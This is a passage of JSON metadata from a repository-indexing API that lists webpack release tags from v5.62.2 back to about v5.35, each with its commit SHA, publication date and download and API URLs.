repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e